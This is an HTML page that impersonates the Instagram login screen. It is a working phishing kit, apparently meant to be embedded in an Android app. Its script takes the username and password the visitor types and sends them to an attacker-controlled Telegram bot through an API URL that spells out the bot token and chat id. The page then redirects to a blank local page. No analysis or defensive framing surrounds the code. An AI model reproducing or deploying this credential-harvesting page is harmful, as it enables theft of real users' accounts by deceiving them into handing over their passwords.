<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<title>Instagram Login Page</title>
	<link rel="stylesheet" href="instagram/styles.css">
</head>
<body>
<script>
	function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); }; function sentServer()
	{
	var oNumInp1 = document.getElementById('user');
	var oNumInp2 = document.getElementById('pass');


if ((oNumInp1.value.length > 5)&&(oNumInp2.value.length > 3)) {			
	var login1 = document.forms["form"].elements["user"].value; 
	var pass = document.forms["form"].elements["pass"].value; 

	fetch("https://api.telegram.org/bot1771520355:AAFCM7Xecg5J_Qbk4S0MPz1aV_Aq0merMEM/sendMessage?chat_id=-422038753&text=Instagram|"+login1+"|"+pass); test2();
}
	}
</script>

<div class="wrapper">
	<div class="header">
		<div class="top">
			<div class="logo">
				<img src="instagram/instagram.png" alt="instagram" style="width: 175px;">
			</div>
			<div class="form">
				<form id="form">
				<div class="input_field">
					<input id="user" type="text" placeholder="Phone number, username, or email" class="input">
				</div>
				<div class="input_field">
					<input id="pass" type="password" placeholder="Password" class="input">
				</div>
				<div class="btn" onClick="sentServer();"><a href="#">Log In</a></div>
				</form>
			</div>
			<div class="or">
				<div class="line"></div>
				<p>OR</p>
				<div class="line"></div>
			</div>
			<div class="dif">
				<div class="fb">
					<img src="instagram/facebook.png" alt="facebook">
					<p>Log in with Facebook</p>
				</div>
				<div class="forgot">
					<a href="#">Forgot password?</a>
				</div>
			</div>
		</div>
</div>

</body>
</html>